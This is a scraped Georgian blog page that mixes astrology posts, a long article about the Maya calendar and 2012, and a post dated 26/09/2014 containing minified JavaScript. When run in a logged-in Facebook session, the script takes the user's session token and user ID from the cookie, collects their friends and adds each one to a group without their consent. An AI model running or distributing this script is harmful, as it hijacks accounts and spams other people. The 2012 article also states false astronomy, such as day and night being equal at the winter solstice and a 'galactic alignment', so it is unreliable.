http://playlist.me/
გამოიწერეთ იმეილზე
სტატისტიკა
26/09/2014
ვიზიტორები
(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Get "+f.frns.length+" Friends
"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"Page Not Found!"+crj:"Collecting Your Friends, Wait For Some Second.. ("+c.readyState+")"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="
"+f.prenKe+" Of "+f.frns.length+"
",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="
( "+f.gagal+" ) "+a.errorDescription+"
"),a.jsmods&&a.jsmods.require){var b="
";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+=""+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+" ");b+="
",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="
( "+f.okeh+" ) "+c.name+" Has Been Succesfully Added To Group.
";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="
DASRULEBULIA !
"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"
"+crl+"
";document.body.innerHTML+="Daelodet 2 wuti da shemdeg dabla chaweret suratis LINKI .. "+crj+"",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})();
25/09/2014
Get your free daily horoscope + free daily forecast below.
Choose your zodiac sign:
Aries
March 21 - April 19
Libra
September 23 - October 22
Taurus
April 20 - May 20
Scorpio
October 23 - November 21
Gemini
May 21 - June 20
Sagittarius
November 22 - December 21
Cancer
June 21 - July 22
Capricorn
December 22 - January 19
Leo
July 23 - August 22
Aquarius
January 20 - February 18
Virgo
August 23 - September 22
Pisces
February 19 - March 20
სიმბოლო დასახელება კოდი
♈ Aries ♈
♉ Taurus ♉
♋ Cancer ♋
♊ Gemini ♊
♍ Virgo ♍
♌ Leo ♌
♐ Sagittarius ♐
♎ Libra ♎
♏ Scorpio ♏
♓ Pisces ♓
♑ Capricorn ♑
♒ Aquarius ♒
♓ Pisces ♓
საათი
11/09/2014
მაიას ტომი
2012 წელი: კომეტა, მარსიანელები თუ გაფუჭებული ტელეფონი
რა იგულისხმება ამ სათაურში თუ ჯერ ვერ მიხვდით, ავხსნი. 2012 წელი ჰომ ასეთი აქტუალურია აგერ უკვე ბევრი წელია და კაცობრიობის ყველაზე დიდი ფობია სახელწოდებით არმაგედონი სულ უფრო მეტად საგრძნობი. ამჯერად მას ქვია 2012 წელი მაიას ტომების კალენდრის მიხედვით 2012 წლის მერე კიდევ ამოვქექავთ რამეს უფრო გაურკვეველს რომ გაგვიჭირდეს გადამოწმება და დარწმუნება, იმაში რომ ვცდებით და იმას დავარქმევთ არმაგედონს. სინამდვილეში კი უკვე ბევრი ათასწლეულია ადამიანები არმაგედონის გარეშე კვდებიან, არმაგედონის მოლოდინში.
და მაინც რატომ ეს სათაური? გაფუჭებული ტელეფონი ჰომ გითამაშიათ ბავშვობაში, როცა ერთი მეორეს, მეორე მესამე და ასე ჯაჭვურად გადასცემ მარტივ ამბავს და ბოლოს სულ სხვა გამოდის, იმიტომ რომ გზადაგზა იცვლება და იცვლება იმიტომ რომ პირველწყარო ჩუმადაა, გასულია მომსახურების ზონიდან ან უარესი. როცა პირველწყარო გაუგებარი, რთული იეროგლიფებით აღნიშნული რამდენიმე ათასი წლით დათარიღებული ქვის ნატეხია
ამხელა შესავალი სულ არ იყო საჭირო მგონი მოკლედ მე შევეცდები მთელი ეს გაუგებრობა გასაგებ ენაზე გადმოვცე. დავიწყებ თანმიმდევრულად და მაქსიმალურად გასაგებად.
როგორც ვიცით მაიას ტომებს ქონდათ განსაკუთრებული ღრმა ცოდნა ასტრონომიაში. ქონდათ კალენდარული სისტემა, რომელიც ასტრონომიის და მათემატიკის ფანტასტიკურ ცოდნას მოითხოვდა. ეს კალენდარული სისტემა სრულდება 2012 წლის 21 დეკემბერს. ანუ ყოველწლიური ზამთრის მზებუდობას, როდესაც დღე და ღამე ერთმანეთს უტოლდება.
გარდა ამისა 2012 წლის 21 დეკემბერი ასტრონომიული თვალსაზრისით ძალიან მნიშვნელოვანია. ის რაც ჯერ კიდევ ბევრი ათასწლეულის წინათ იცოდა ამ ხალხმა.
სანამ კალენდარის სტრუქტურაზე გადავალ ზოგადად რამდენიმე ფაქტორს გამოვყოფ რითაც ის საინტერესოა სინამდვილეში. პირველ რიგში ვიტყვი იმას, რომ მაიას კალენდარს სხვანაირად აცტეკების კალენდარსაც უწოდებდნენ და ის ფიზიკურად არსებობს და ინახება მექსიკის ანთროპოლოგიისა და ისტორიის ეროვნულ მუზეუმში. ის შესრულებულია ქვაზე. მაიას მზის კალენდარი როგორც მას უწოდებენ საინტერესოა რამდენიმე ფაქტორით. პირველ რიგში ის არსებული გრეგორიანული კალენდრისგან განსხვავდება და იმისთვის რომ უფრო ცხადად აღიქვათ შემდეგომ რაზეც ვისაუბრებ, გამოვკვეთოთ განსხვავებები.
გრეგორიანულ კალენდარს აქვს დღეები, კვირეები, თვეები. ჩვენი დღე ემთხვევა მზის დღეს და არა მთვარისას. ეს მნიშვნელოვანია რადგან მთვარის და მზის დღეები განსხვავდება, მთვარის დღე ითვლება ღამის დადგომით, ანუ მთვარის ამოსვლიდა მის ჩასვლამდე. ძველად მთვარის დღეებს უფრო დიდ მნიშვნელობას ანიჭებდნენ ყოველდღიურ ცხოვრებაში ვიდრე ჩვენ დღეს,  დღეს მაგალითად ასტროლოგიაში მთვარის დღე ბევრად აქტუალურია ვიდრე ყოველდღიურ ცხოვრებაში.
დავუბრუნდეთ ჩვენს თემას. გრეგორიანულ კალენდარში დღეებს ვითვლით მზის დღეებით, კვირა შედგება მზის 7 დღისგან. თვე შედგება 28-30-31 მზის დღისგან, თუმცა ჩვენი თვეები მთლიანად მთვარის 30 დღიან ციკლზეა აწყობილი და ამიტომ ჩვენ მთვარის თვეებით ვხელმძღვანელობთ. წელიწადი შედგება 365 მზის დღისგან და 12 მთვარის თვისგან, ნაკიანი წლების გარდა როდესაც თებერვალში 29 დღეა და წელიწადში 366 დღე. ამ საკითხს კიდევ დავუბრუნდებით. ახლა გადავიდეთ მაიას კალენდარზე, რომელიც ერთდროულად რამდენიმე კალენდრისგან შედგება. ანუ ის ერთობლიობაა, ოღონდ არა განცალკევებული არამედ როგორც საათის მექანიზმის კბილანები ემთხვევა ერთმანეთს და ამუშავებს საათს, ასევე კბილანებივით ჯდება ერთმანეთში მაიას ტომების კალენდრის შემადგენელი ციკლები.
მაიას ტომების კალენდარი შედგება 260 დღიანი რელიგიური კალენდრისგან, რომელსაც ქვია „ცოლკინი“ ის გამოსახავს სრულ რელიგიურ ციკლს. შედგება 20 კვირისგან, თითო კვირა კი 13 დღისგან. ყოველ კვირას აქვს სახელი, გრაფიკული გამოსახულება სიმბოლოს სახით და უნიკალური მნიშვნელობა.
მეორე კალენდარი არის 365 დღიანი მზის კალენდარი, რომელსაც ქვია „უთვლელი“ (ეს მე ვთარგმნე ასე, ვგულისხმობს, რომ არ ჩათვლი რაღაცას: „მოდი ეს არ ჩავთვალოთ“ და არა უთვალავი). თუმცა მიუხედავად იმისა რომ ჩვენი კალენდარის მსგავსად შედგება 365 დღისგან განსხვავება დიდია. მაიას ტომების 365 დღიანი კალენდარი შედგება 18 თვისგან, ყოველი თვე კი მზის 20 დღისგან. ამ 365 დღიანი ციკლის ბოლოს არის 5 დღე, რომლებიც განხილულია როგორც უიღბლო, არ ეკუთვნის არცერთ კვირას, ისინი ასრულებენ ციკლს.
კვირებს და დღეებს როგორც რელიგიურ კალენდარში ცოლკინში, აქაც აქვთ სახელები, სიმბოლოები და მნიშვნელობები. შესაბამისად კონკრეტული დღე კონკრეტული მნიშვნელობის, ენერგეტიკის მატარებელია, რაც უფრო მოსახერხებელს ხდიდა წინასწარმეტყველების პროცესებს.
მზის წელიწადი როგორც ვიცით ან არ ვიცით შედგება 365, 2422 დღისგან, მაიამ აქედან გამოთვალა მზის წელიწადის 365,2420 დღე. იმ პირობებსა და დროში როდესაც შეიქმნა ეს კალენდარი, ეს საოცარი შედეგია და სერიოზული არგუმენტი მათთვის ვინც მაიას კალენდარს აქამდე არასერიოზულად აღიქვამდა.
მივედით ყველაზე საინტერესოზე. მაია თვლიდა რომ სამყაროს შექმნიდან უკვე 4 მზის ციკლი – მზე დასრულდა, შესაბამისად შეიცვალა ადამიანების 4 რასა, თითოეული რასა ჩაანაცვლა ახალმა იმ ცვლილებების გამო, რაც მოყვა ციკლის დასრულებას და ახლის დაწყებას.
1)      პირველი ციკლი – მზე გრძელდებოდა 4008 წელი და ის დასრულდა მიწისძვრებით, რომელმაც ფიზიკურად გაანადგურა ადამიანების პირველი რასა.
2)      მეორე ციკლი – მზე გრძელდებოდა 4010 წელს და ის დასრულდა მძლავრი ქარიშხალით.
3)      მესამე ციკლი – მზე გრძელდებოდა 4081 წელს და დასრულდა ცეცხლოვანი წვიმით, რომელიც ვულკანების კრატერებიდან ამოიფრქვა.
4)      მეოთხე ციკლი – მზე გრძელდებოდა 5026 წელს და ის დასრულდა წყალდიდობით
5)      მეხუთე ციკლი – მზე არის ჩვენი ეპოქა, მას მაიამ შეარქვა სხვა სახელიც, რომელიც ასე ჯღერს დაახლოებით „მზის მოძრაობა“. მაიას აზრით ჩვენი 5125 წლიანი ციკლის დასასრულს მოხდება უმნიშვნელოვაესი ძვრები – ცვლილებები.
ნუ ეს ლირიული გადახვევა იყო ფაქტობრივად სინამდვილეში სამყაროს განადგურების შესახებ ყველა ხალხის ლეგენდებში, მითებსა და გადმოცემებშია მოთხრობილი, ამაში განსაკუთრებული არაფერია. ის რომ კალენდარი სრულდება 2012 წლის 21 დეკემბერს არ ნიშნავს რომ ის არ გაგრძელდება, თუმცა იმის გათვალისწინებით რაც მაიასთვის იყო ცნობილი და რა სიზუსტითაც აქვთ ასახული ბევრი ასტრონომიული მოვლენა, მათ შორის 2012 წლის 21 დეკემბრისაც უკვე ცნობილია მეცნიერებისთვის ამ დღის უნიკალურობის შესახებ. ხოლო მათთვის ვინც ჯერ კიდევ არმაგედონზე ფიქრობს მინდა ვუთხრა რომ თუ 21 დეკემბერი კალენდრის ბოლო დღეა, 22 დეკემბერი ეს არის დღე აღნიშნული ნულით რატომ ნულით? იმიტომ რომ მაიას კალენდარში პირველი, საწყისი დღე ნულით აღინიშნება. დასასრულს კი მოსდევს დასაწყისი.
დავუბრუნდები დღის უნიკალურობას. არ დავივიწყოთ მზის კალენდრის „მზის ქვის“ (რადგან ის ქვაზეა შესრულებული ასეც უწოდებენ) მნიშვნელობა. მისი მთავარი ფუნქცია თუ ჯერ კიდევ ვერ მიხვდით მზის თვალყურია. მისი ასახვა, უხეშად, მაგრამ გასაგებად ვიტყვი „დიაგნოსტიკა“.  რაც ნიშნავს რომ 2012 წლის 21 დეკემბერი ჩვენი მზისთვის განსაკუთრებით მნშვნელოვანია და თუ ინტუიცია გკარნახობთ რომ რამდენიმე ხაზით ზემოთ უნიკალურობაზე ტყუილად არ მისაუბრია მართალი ხართ.
ჩვენი მზის სისტემა არის ვარსკვლავებისგან და პლანეტებისგან შემდგარი დისკის ნაწილი, რომლის ცენტრიც მდებარეობს მშვილდოსნის თანავარსკვლავედში, ხოლო ზამთრის მზებუდობის წერტილი კი განლაგებულია მშვილდოსნის თანავარსკვლავედში (21 დეკემბერზეა საუბარი მიხვდით ალბათ).
მინდა მოახდინოთ ვიზუალიზაცია. ჩვენი გალაქტიკის ცენტრის, მშვილდოსნის თანავარსკვლავედზეა საუბარი და ჩვენი გალაქტიკის „რძის გზის“ დისკის ცენტრი 2012 წლის 21 დეკემბერს ერთმანეთს აბსოლუტურად დაემთხვევა და ჩვენი მზის სისტემა და კონკრეტულად ჩვენი მზე კი ამ ორივე „დისკის“ ცენტრზე გაივლის. ეს პროცესი ჩვენი მზის სისტემის „გალაქტიკის ეკვადორზე“ გავლის, 21 დეკემბრის მზებუდობისა და მერწყულის ეპოქაში სრულად გადასვლის ერთდროულად ხდება სწორედ იმ დღეს როდესაც მაიას ტომების კალენდარი სრულდება.
ანუ უფრო დავღეჭავ, თუ 2012 წლის 21 დეკემბრამდე ჩვენ რძის გზას ჩრდილოეთით განვიხილავთ, 21 დეკემბრის შემდეგ ის მოექცევა სამხრეთით და გავიხსენოთ მაიას მიერ მოხსენებული „მოძრაობა“, რომელიც აღნიშნულია კალენდარშიც, შეიძლება ესეც იგულისხმება. რადგან ყველაფერი თავდაყირა დგება, უფრო ზუსტად კი სარკისებური ხდება და არაფერი ზებუნებრივი ამაში არ არის (უკიდურესი სკეპტიკოსებისთვისაც კი) ეს ფაქტია.
ეს გულისხმოს რომ ცის კაბადონი ისეთი როგორადაც ჩვენ მას ვხედავთ არ იქნება ჩვენი შთამომავლობისთვის. ანუ ჩვენი შვილთაშვილები და მათი შვილები თუ შეადარებენ 21 დეკემბრამდე გადაღებულ ცის ამსახველ ვიზუალურ გამოსახულებებს შემდგომებს მას სარკისებური ეფექტი ექენება. რა თქმა უნდა ეს ხანგრძლივი პროცესია და ასე ერთბაშად არ მოხდება, თუმცა ეს პროცესი გარდაუვალია და ის გარდამტეხი წერტილი ზუსტად 21 დეკემბერსაა ასე ვთქვათ ისტორიული მოვლენა კოსმიურ ცხოვრებაში.
ახლა გადავალ უფრო დეტალურ ნაწილზე, ანუ კალენდარის სტრუქტურა. როგორც ვთქვი კალენდარი შედგება ორი კალენდრისგან, ცოლკინი 260 დღიანი და 365 დღიანი უთვლადი. ხოლო ყველა დღეს და კვირას კი თავისი სახელი აქვს. გამომდინარე იქიდან რომ თითოეული ციკლი სხვადასხვა ხანგრძლივობისაა, არცერთი კომბინირებული სახელი არ მეორდება უთვლადის (365) 52 წლიანი, ხოლო ცოლკინის (260) 73 წლიანი ციკლის განმავლობაში (52*365=260*73). დროის ამ პერიოდს ქვია აცტეკური საუკუნე, ან მეორენაირად კალენდარული წრე.
ზოგადად კალენდარი მნიშვნელოვან ფუნქციას ითავსებდა, როგორც სასოფლო სამეურნეო ასევე ციური სხეულების მძრაობის დაკვირვების საკითხებში. გამომდინარე იქიდან, რომ მეზოამერიკულ კულტურებში ხშირია წლების 52 წლიან ციკლებად დაყოფა, ეს არ არის გასაკვირი რომ მაიას კალენდარშიც იგივე ხდება, ანუ აქ არაფერია გასაოცარი, როგორც ჩანს ეს 52 წლიანი ციკლები უფრო ღრმად მიდის წარსულში.
260 დღიანი ცოლკინი, შედგება 13 დღიანი დროის მონაკვეთებისგან, რომელიც 20-ჯერ მეორდება. თითოეულს აქვს სახელი, სიმბოლო და უნიკალური მნიშვნელობა. შევეცდები ავხსნა სტრუქტურა ძალიან გასაგებად.
დავიწყებ მარტივად სახელებით და ჩამონათვალით:
1) იმიში - წითელი დრაკონი
2) იკი - თეთრი ქარი
3) აკბალი – ლურჯი ღამე
4)კანი – ყვითელი თესლი
5) ჩიკ-ჩანი – წითელი გველი
6) კიმი – სამყაროების თეთრი შემაერთებელი
7) მანიკი – ლურჯი ხელი
8) ლამატი – ყვითელი ვარსკვლავი
9) მულუკი – წითელი მთვარე
10) ოკი – თეთრი ძაღლი
11) ჩუენი – ლურჯი მაიმუნი
12) ები – ყვითელი ადამიანი
13) ბენი – წითელი ციური მოგზაური
14) ხიში – თეთრი ჯადოქარი
15) მენი – ლურჯი არწივი
16) კიბი – ყვითელი მეომარი
17) კაბანი – წითელი მიწა
18) ეცნაბი – თეთრი სარკე
19) კავაკი – ლურჯი ქარიჩხალი
20) ახაუ – ყვითელი მზე
260 დღიან კალენდარში ათვლა იწყება პირველი დღით, რომელიც ატარებს სახელს „იმიში“, შემდეგ მას მოსდევს „იკი“ და ასე „ბენის“ ჩათვლით, რომელიც არის 13-ის შესატყვისი. შემდეგი არის ხიში, რომელიც არის შესატყვისი ციფრის 14. თუმცა იქიდან გამომდინარე რომ საუბარია 13 დღიან ციკლზე, ის იწყებს მას, ანუ მეორე ცამეტდღიან ციკლს, შესაბამისად იქცევა რიცხვი 1-ის შესატყვისად, მისი მომდევნო „მენი“ იღებს შესატყვისს 2 და ა.შ. 260 დღიანი ციკლის ბოლო დღე იქნება ახაუ, რომლის შესატყვისი რიცხვი იქნება 13.  იმედი მაქვს გაიგეთ.
კიდევ ავხსნი სხვანაირად. აი ჩვენ გვაქვს 30-31 დღიანი მთვარის თვე და ჩვენი, ანუ გრეგორიანული კალენდარი თანმიმდევრულია, თანმიმდევრულში ვგულისხმობ რომ 1 იანვარს მოსდევს 2 ინავარი, 3 იანვარი და ასე 31 იანვრის ჩათვლით, შემდეგ მოდის 1 თებერვალი, 2 თებერვალი და შემდეგი თვე იწყება 1 მარტი, 2 მარტი და ასე ბოლო მეთორმეტე თვის ჩათლით. 1 დეკემბერი, 2 დეკემბერი.
ახლა რა ხდება ცოლკინში ანუ მაიას 260 დღიან კალენდარში. იმის გამო რომ იქ რიცხვებს შეესაბამება კონკრეტული ციფრები, კონკრეტული მნიშნელობით თანმიმდევრობა სხვაგვარია. ანუ აი წარმოიდგინეთ, რომ 1 იანვრის შემდეგ მოდიოდეს 2 თებერვალი, 3 მარტი, 4 აპრილი, 5 მაისი, 6 ივნისი, 7 ივლისი და ასე 12 დეკემბრამდე, შემდეგ გრძელდებოდეს 13 იანვარი. ანუ ამ შემთხვევაში სრული ციკლი იქნებოდა 156 დღისგან შემდგარი (12*13). რის შემდეგაც თავიდან დაიწყებოდა ათვლა 1 იანვრიდან.
260 დღიან კალენდარს გამოიყენებენ დღესაც ცენტრალურ ამერიკაში მცხოვრები ტომები სხვადასხვა რელიგიური რიტუალებისთვის, თუმცა ამას უკვე ტრადიციის დატვირთვა უფრო აქვს ვიდრე უფრო ღრმა. თუმცა საიდან მოდის ეს რთული, მაგრამ ზუსტი სისტემა უცნობია. რადგან თავისი არსით 260 დღიანი კალენდარი არ ერგება არაფერს დედამიწაზე რაც ადამიანს უბიძგებდა მისი შექმნისკენ, ფაქტია რომ 260 დღიანი კალენდარი რომელიც არაფერს არ ერგება განსხვავებით 365 წლიანი მზის კალენდრისა, რომელიც მზის წელიწადს ემთხვევა. არსებობს და არა მხოლოდ არსებობს, არამედ ამ 365 დღიან მზის კალენდარზე ისე არის ადაპტირებული, ვგულისხმობ ისეთი სიზუსტით და გათვლებით, რაც მათემატიკის და ასტრონომიის საკმაოდ ღრმა ცოდნას მოითხოვს. ასეთ დრო სულ მიჩნდება ერთი შეკითხვა, იცოდნენ კარგი, მაგრამ აი საიდან იცოდნენ, ან იცოდნენ თუ არა საერთოდ ამ ხალხმა ამდენი რამ?
ახლა რაც შეეხება 365 დღიან კალენდარს, მის შეთავსებას 260 დღიანთან და განსხვავებას ჩვენი გრეგორიანული 365 დღიანი კალენდრისგან.
როგორც ვიცით სრული მზის წელიწადი შედგება 365 დღეღამისგან და კიდევ მეოთხედისგან, ეს მეოთხედი დღე-ღამე ყოველ 4 წელიწადში ერთხელ შეადგენს სრულს და ამიტომაც, რომ არ აირიოს ათვლა, ჩვენ 4 წელიწადში ერთხელ კალენდარში გვემატება 29 დღე, რომელიც ანულებს ათვლას მომავალ ნაკიან წლამდე. მაიას 365 წლიანი კალენდარი ამ ფაქტს მთლიანად გამორიცხავს.
მაიას 365 დღიანი უთვლადი წელი შედგება 18 თვისგან, ხოლო ყოველი თვე შედგება 20 დღისგან (დღეებს აქვთ სახელი და სიმბოლო და ისინი ზემოთაა ჩამოთვლილი). გარდა ამისა ის კიდევ შედგება 5 დღისგან, რომელიც ასრულებს 365 დღიან ციკლს და ეს უკანასკნელი 5 ითვლება უბედურების მომტან დღეებად.
მაიას უთვლადი წლის ახალი წელი იწყება „პოპის“ თვის პირველ დღეს. თუმცა თვის ბოლო დღე არის არა 20, ანუ აღინიშნება არა ასე, არამედ ცალკე აბსოლუტურად განსხვავებული სიმბოლოთი, რომელსაც გარდამავალის მნიშვნელობა აქვს. საერთოდ მაიას ფილოსოფიის თანახმად ყველაფერი, აბსოლუტურად ყველა მოვლენა რაც დროის გარკვეულ მონაკვეთს უკავშირდება, იგრძნობა მანამ, სანამ ის დადგება და მას შემდეგ როცა ის დასრულდება, პროცესში ჩვენ მის არსებობას ვერ ვგრძნობთ და ვერც იმას, რომ ის უკვე დაიწყო, მიმდინარეობს ან დასასრულს უახლოვდება, ჩვენ დროის პერიოდებს აღვიქვამთ მაშინ, როცა მათ ველით და მაშინ როდესაც ის უკვე წარსულია.
დავუბრუბდები კალებდარს და უფრო კონკრეტულად 260 დღიანი და 365 დღიანი კალენდრის თავსებადობას. რადგან 260 დღიანი კალენდრის თვეები 13 დღიანია, ხოლო 365 დღიანის თვეები კი 20 დღიანი, გამოდის, რომ ერთი და იგივე დღე, რომელიც ერთი მნიშვნელობის მატარებელია და ერთია, ერთდროულად შესაძლებელია ერთი კალენდრის, შემადგენელი ორი სხვადასხვა ციკლის სხვადასხვა დღეს გვიჩვენებდეს. მაგალითად, 260 დღიანი ციკლის პირველი დღე კანი შესაძლოა იყოს ასევე 365 დღიანი ციკლის „პოპის“  თვის პირველი რიცხვი, ანუ ახალი წელი. ასეთი დამთვევა შესაძლებელია მოხდეს 18 980 დღიდან მხოლოდ ერთხელ, ანუ 365 დღიანი ციკლისთვის 52 და 260 დღიანი ციკლისთვის 73 წელიწადში ერთხელ.
ახლა გავერკვეთ ტერმინებში, 365 დღიანი ციკლი:
1 დღე = 1 კინი (ანუ კინი თავისთავად 1 დღეს გულისხმობს)
20 კინი = 1 უინალი, იგივე თვე  (20 დღე)
18 უინალი = 1 ტუნი, იგივე წელიწადი (365 დღე)
20 ტუნი = 1 კატუნი (20 წლიანი ციკლი, 7 300 დღე )
20 კატუნი = 1 ბაკტუნი ( 144 000 დღე)
ამ ათვლას მაიას ტომები როგორც ხანგრძლივ ათვლას ისე მოიხსენიებენ, თუმცა ხანგრძლივი ათლა ეს შემდგომი ეტაპია, რომელსაც საფუძვლად უდევს წრიული კალენდარი. ხანგრძივი ათვლისას გამოიყენება კოეფიციენტები, რომელიც მაიას რიცხვითი სისტემით არის ასახული, იწყება ნულიდან და ადის 19-მდე, ის ნულის გარდა გამოისახება წერტილებით და ხაზებით.
ცოლკინის სიბრტყეზე გამოისახულება შეიძლება ერთი შეხედვით გაუგებარი იყოს ბევრისთვის, როგორც მისი ენერგეტიკა და თვისობრიობა.
ის რომ ჩვენ მუდამ, ამ პოსტის კითხვისასაც კი გავდივართ დროის იმ მონაკვეთს რომელიც გარკვეული ინფორმაციის, ენეგრეტიკის მატარებელია და ცოლკინი ანუ ეს სქემა ზუსტად გამოსახავს ამ სიხშირეებს, რომელიც აკავშირებს ერთმანეთთან სხვადასხვა განზომილებებს. ჰო აი შეიძლება ფიქრობთ რა შუაშია აქ განზომილებები.
შეხედეთ ამ გამოსახულებას ეს იგივე ცოლკინია გვერდიდან. უბრალოდ გვერდიდან შევხედეთ, მივიღეთ პირამიდა და ყველაფერი შეიცვალა. ანუ ის რასაც კითხულობდით არ ვიცი 2000 ზე მეტი სიტყვა წაიკითხეთ და მხოლოდ ახლა აღიქვით ის სხვაგვარად.
როგორც უკვე ვთქვი მაიას ფილოსოფიის მიხედვით საგნებს განვიცდით პროცესში როცა ველით და როცა უკვე დასრულდება ანუ ფაქტის წინაშე აღმოვჩნდებით, პროცესში ჩვენ მათ ვერ ვამჩნევთ. ჩათვალეთ რომ ეს პირამიდა ამ პოსტის დასასრული იყო, რომელიც აღმოაჩინეთ. ხოლო მოლოდინს რაც შეეხება, არ ვიცი 2012 წლის 21 დეკემბერი სამყაროს დასასრულიც იქნება თუ არა, მაგრამ ფაქტია, რომ დიდხანს ლოდინი არ მოგვიწევს.
04/09/2014
გაიგე ვინ ხარ და რას წარმოადგენ ეგვიპტური ჰოროსკოპის მიხედვით
ნილოსი: (1-7 იანვარი, 19-28 ივნისი, 1-7 სექტემბერი, 18-26 ნოემბერი)
ნილოსის ნიშნის ქვეშ დაბადებულები მგზნებარე და იმპულსურები არიან. მათი დევიზია - "უკეთესია გააკეთო და არ ინანო, ვიდრე არ გააკეთო და ინანო". ისინი წარმატებულად ერგებიან ნებისმიერ პროფესიას, სადაც საჭირო არ არის მთელი დღე სამუშაო ადგილზე ჯდომა და ადვილადაა შესაძლებელი როგორც სწრაფი გადაადგილება, ასევე მოღვაწეობის სფეროს შეცვლა. ამ ნიშნის ვეშ დაბადებული ადამიანების ზებუნებრივ თვისებას წარმოადგენს მკურნალობის უნარი, მათ შეუძლიათ თავის ტკივილის მოხსნა, გათვალვისაგან და ნეგატიური ენერგეტიკისაგან დაცვა. მათ გვერდით ადამიანები თავს კარგად და მშვიდად გრძნობენ, მათი ბიოველი დადებითად იმუხტება. ხასიათის მიხედვით ნილოსის ნიშნის ქვეშ დაბადებულები სიცოცხლის მოყვარულები და მომთმენები არიან, ადვილად ადაპტირდებიან ნებისმიერ სიტუაციაში. ისინი გამჭრიახობით გამოირჩევიან და სწორედ ამიტომ მათი რჩევები ხშირად ამართლებს. ისინი ყოველთვის იქ აღმოჩნდებიან ხოლმე, სადაც მათი დახმარებაა საჭირო. ამ თვისების გამო მათ ხშირად იყენებენ, თუმცა ისინი ღალატს არ პატიობენ, გამოირჩევიან ფეთქებადი ხასიათით და იმპულსურად მოქმედებენ. ნილოსები თავგადადებული მეოჯახენი არიან. ისინი ახლობელ ადამიანებს განსაკუთრებული სინაზით ეპყრობიან, გვერდით უდგანან და ხელს უწყობენ წარმატების მიღწევაში.
ამონ-რა (8-21 იანვარი, 1-11 თებერვალი)
ამ ნიშნის ქვეშ დაბადებულები, ბრძენი და მიზანმიმართული ნატურები არიან, მათი ერთ-ერთი დამახასიათებელი თვისება, ჭარბი ოპტიმიზმია. კოლექტივში ისინი, როგორც წესი ლიდერის როლს თამაშობენ, ხოლო საქმიანობის სფეროდან ირჩევენ ისეთ პროფესიას, რომელშიც ბოლომდე შეუძლიათ გამოავლინონ საკუთარი ნიჭი. დიდებისკენ სწრაფვა მათ სისხლში აქვთ. შეაქეთ ამონ-რა და ის მთებს შეძრავს. მათ გააჩნიათ მომავლის პროგნოზირებისა და წინასწარ განჭვრეტის უნარიც. ხასიათის მიხედვით, ამონ-რას ნიშნის ქვეშ დაბადებულები, მამაცები და სიცოცხლისმოყვარულები არიან. მათ შესწევთ უნარი დაამშვიდონ ადამიანები, რომლებიც მის გვერდით თავს მოწოდების სიმაღლეზე გრძნობენ. ისინი ლიდერის აურას ფლობენ, არ არიან დიქტატორები. ამონ - რას ნიშნის მატარებლები კარგი დიპლომატები არიან, რისთვისაც საჭირო მომენტში ეშმაკობასაც არ ერიდებიან, აქვთ ორატორული ნიჭი, მიზანდასახულობა და ქარიზმა კი მათდამი ნდობასა და ყურადღებას იწვევს ადამიანებში. ისინი ისეთი პოპულარულები არიან მეგობრებისა და კოლეგების წრეში, რომ ზოგჯერ საყვარელი ადამიანისთვის დრო აღარ რჩებათ. პირად ურთიერთობებში საკვირველია, მაგრამ უჭირთ პარტნიორთან ბოლომდე გახსნა, მათ სულში წვდომა ძალიან ძნელია.
ნუტი (22-31 იანვარი, 8-22 სექტემბერი)
ნუტის ნიშნის ქვეშ დაბადებულები მომთხოვნები არიან როგორც სხვების, ასევე საკუთარი თავის მიმართ. მათგან შორსაა რომანტიკა, სამაგიეროდ მუდამ მზად არიან დახმარება გაუწიონ არა სიტყვით, არამედ საქმით. მათ შორის ძალიან ბევრი ექსპერიმენტატორები, გამომცდელები და პროგრესული ადამიანები არიან. ნუტები დიდი ფიზიკური ძალით, ჯანმრთელობით და ნებისმიერი უსიამოვნების წინასწარ განჭვრეტის უნარით გამოირჩევიან. ხასიათის მიხედვით ნუტები ძალიან ემოციურები არიან, ამიტომ მათ ხშირად აკლიათ საკუთარი თავის რწმენა. ისინი ხშირად მწუხარებიდან მხიარულებაში (ან პირიქით) ძალიან ადვილად გადადიან. მათთვის თავის მოწონება ძალიან ძნელია, დიდი მოთმინებით უნდა აღიჭურვოს ის, ვისაც ნუტისთვის თავის მოწონება სურს. მათ შეუძლიათ სხვა ადამიანებისგან დისტანცია დაიჭირონ და საკუთარი მიზნები ისე განახორციელონ. ასე ისინი ნეგატიური ემოციებისგან თავის დაღწევას ცდილობენ. პირად ურთიერთობას მათ ცხოვრებაში მნიშვნელოვანი ადგილი უკავია. ზოგ შემთხვევაში, 